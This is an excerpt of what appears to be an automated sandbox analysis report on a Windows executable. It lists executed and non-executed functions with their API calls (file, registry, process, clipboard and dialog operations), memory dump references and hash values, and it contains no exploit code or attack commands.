Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15

Function 00405C30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D

Function 73472B98 Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000), ref: 73472C57

Memory Dump Source

Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7a05ccaad1b6662d3dd4d13e61060b607dd5efce7e322a578149e2ce4aea1d29
Instruction ID: 9c435f2961e39c9e0027189cda07adf99122f04ff0ca27312e0ffaf6570251c8
Opcode Fuzzy Hash: 7a05ccaad1b6662d3dd4d13e61060b607dd5efce7e322a578149e2ce4aea1d29
Instruction Fuzzy Hash: 73419EB290034CEFEB2DAF65D985BD937F9FB45310F308869E409EA240D6399481CBD9

Function 00402896 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4

Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
Instruction ID: a9a910f18d9475f192186a99a32baa3f0737176f8f71227260f04108cb8f5765
Opcode Fuzzy Hash: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
Instruction Fuzzy Hash: CEE06D71A04108BFDB01ABA5BE499AEB3B9EB44354B20483FF102B00C8CA784D119A2D

Function 004023B7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D

Function 0040651D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 00406546

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: eb898ae1b777051f051c4ab58df26dcf4e878c8f9f4a5c47b005eb973d4bb03b
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: 75E0E6B2010109BEEF095F50EC0AD7F371DE708710F11452EF906D4051E6B5E9309A39

Function 00406224 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0040F4A1,0040CEF0,0040357E,0040CEF0,0040F4A1,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9

Function 004061F5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4

Function 73472A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(7347505C,00000004,00000040,7347504C), ref: 73472A9D

Memory Dump Source

Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d1f99a19aaa2913472e988d89cfd0011bc755184f41912cacac2d584780cf521
Instruction ID: e3a5f00a3b2e647522ed3cab35799053b6b4245586facda4ea003a24a9e263e6
Opcode Fuzzy Hash: d1f99a19aaa2913472e988d89cfd0011bc755184f41912cacac2d584780cf521
Instruction Fuzzy Hash: 90F0AEF2A002C0DED358EF2A8444B093BE0F74A304B3445AAE19CFE282E3344048CFA5

Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749

Function 004064EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040657D,?,00421F28,?,?,Call,?,00000000), ref: 00406513

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59

Function 004035FD Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54

Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
Opcode Fuzzy Hash: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E

Function 734712BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,734712DB,?,7347137F,00000019,734711CA,-000000A0), ref: 734712C5

Memory Dump Source

Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 68983a30cdf02bfe00ae2c72683dc38d3cb16f27c5c45badca8513c83343505f
Instruction ID: 0c94d5095c9e519da184bfbbb4d5dc33e7f3101162753b0dfde240c64cfdd786
Opcode Fuzzy Hash: 68983a30cdf02bfe00ae2c72683dc38d3cb16f27c5c45badca8513c83343505f
Instruction Fuzzy Hash: 72B002B2640150DFEE44AB55DD4AF3536D4F740705F644450B609F5151D56458148565

Non-executed Functions

Function 00405846 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004058A4
GetDlgItem.USER32(?,000003EE), ref: 004058B3
GetClientRect.USER32(?,?), ref: 004058F0
GetSystemMetrics.USER32(00000002), ref: 004058F7
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
ShowWindow.USER32(?,00000008), ref: 00405993
GetDlgItem.USER32(?,000003EC), ref: 004059B4
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
GetDlgItem.USER32(?,000003F8), ref: 004058C2

Part of subcall function 00404636: SendMessageW.USER32(00000028,?,?,00404461), ref: 00404644

GetDlgItem.USER32(?,000003EC), ref: 00405A06
CreateThread.KERNEL32(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
CloseHandle.KERNEL32(00000000), ref: 00405A1B
ShowWindow.USER32(00000000), ref: 00405A3F
ShowWindow.USER32(?,00000008), ref: 00405A44
ShowWindow.USER32(00000008), ref: 00405A8E
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
CreatePopupMenu.USER32 ref: 00405AD3
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
GetWindowRect.USER32(?,?), ref: 00405B07
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
OpenClipboard.USER32(00000000), ref: 00405B68
EmptyClipboard.USER32 ref: 00405B6E
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
GlobalLock.KERNEL32(00000000), ref: 00405B84
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
CloseClipboard.USER32 ref: 00405BC9

Strings

H/B, xrefs: 00405B34
{, xrefs: 00405AAC

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H/B${
API String ID: 590372296-332483393
Opcode ID: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
Opcode Fuzzy Hash: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68

Function 00404AF2 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B41
SetWindowTextW.USER32(00000000,?), ref: 00404B6B
SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
CoTaskMemFree.OLE32(00000000), ref: 00404C27
lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C59
lstrcatW.KERNEL32(?,Call), ref: 00404C65
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77

Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9

Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
